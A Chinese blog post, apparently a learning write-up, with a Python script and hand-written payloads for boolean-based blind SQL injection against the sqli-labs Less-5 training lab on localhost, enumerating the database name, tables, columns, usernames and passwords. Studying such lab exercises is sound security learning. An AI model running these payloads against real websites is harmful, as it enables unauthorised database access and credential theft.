• sqli-labs第5关布尔盲注pyhton脚本


    import requests
    import os
    
    #此函数先判断数据库长度
    def length(url,str):
    	num = 1
    	while True:
    		str_num = '%d' %num
    		len_url = url + "' and (select length(database()) = " + str_num +")--+"
    		response = requests.get(len_url)
    		if str in response.text:
    			print("数据库长度为:%s" %str_num)
    			content(url,str,num)
    			break
    		else:
    			num = num + 1
    
    #此函数判断字符串具体的内容
    def content(url,str,num):
    	s = ['1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
    	con_num = 1
    	while con_num <= num:
    		str_num = '%d' %con_num
    		for i in s:
    			con_url = url + "' and (select mid(database(),"+ str_num +",1)='"+ i +"')--+"
    			response = requests.get(con_url)
    			if str in response.text:
    				fwrite(i)
    		con_num = con_num + 1
    #此函数对字符串的内容做记录并输出
    def fwrite(i):
    	fp = open("cache.txt",'a')
    	fp.write(i)
    	fp.close()
    if __name__ == '__main__':
    	url = "http://localhost/sqli-labs/Less-5/?id=1"
    	response = requests.get(url)
    	str = "You are in..........."
    	if str in response.text:
    		length(url,str)
    	else:
    		print("请输入正确的地址")	
    

      初学python,只注重实现功能,不要太在意某些细节,如有建议,感谢提出。

      

    #库中有几个表:

    1' and ((select count(table_name) from information_schema.tables where table_schema = 'security') = 4)--+
    

    #测表名长度:

    1' and (select length((select table_name from information_schema.tables where table_schema = 'security' limit 0,1)) = 10)--+
    

    #爆表名:

    1' and (select mid((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='a')--+

    #表中有几列:

    1' and ((select count(column_name) from information_schema.columns where table_name = 'users' and table_schema = 'security') = 3)--+

    #测列名长度:

    1' and (select length((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1)) = 8)--+
    

    #爆列名:

    1' and (select mid((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1),1,1)='u')--+
    

    #爆用户名:

    1' and (select mid((select username from security.users limit 0,1),1,1)='d')--+
    

    #爆密码:

    1' and (select mid((select password from security.users limit 0,1),1,1)='d')--+
    

     以上标红的就是需要递归测试的地方(标红的地方不显示-.-!,将就看),需要者可自行修改代码。还有上述代码中 s 列表请针对具体的情况修改,因为没有特殊字符以及大写字母等。

  • 相关阅读:
    推荐一款天气App 知心天气
    [推荐]Android DoraemonKit 工具
    推荐一款互动式追星神器App爱豆陪陪
    推荐一款语音直播连麦App YAMI
    推荐一款健康App 多喝水,引领全民时尚喝水生活习惯
    推荐一款万年历App 诸葛万年历
    [原创]A/B测试系统调研思维导图
    推荐一款走路赚钱App爱步行
    2条最佳实践App疯狂增长逻辑
    推荐分享AB测试服务商
  • 原文地址:https://www.cnblogs.com/Spec/p/10648793.html
Copyright © 2020-2023  润新知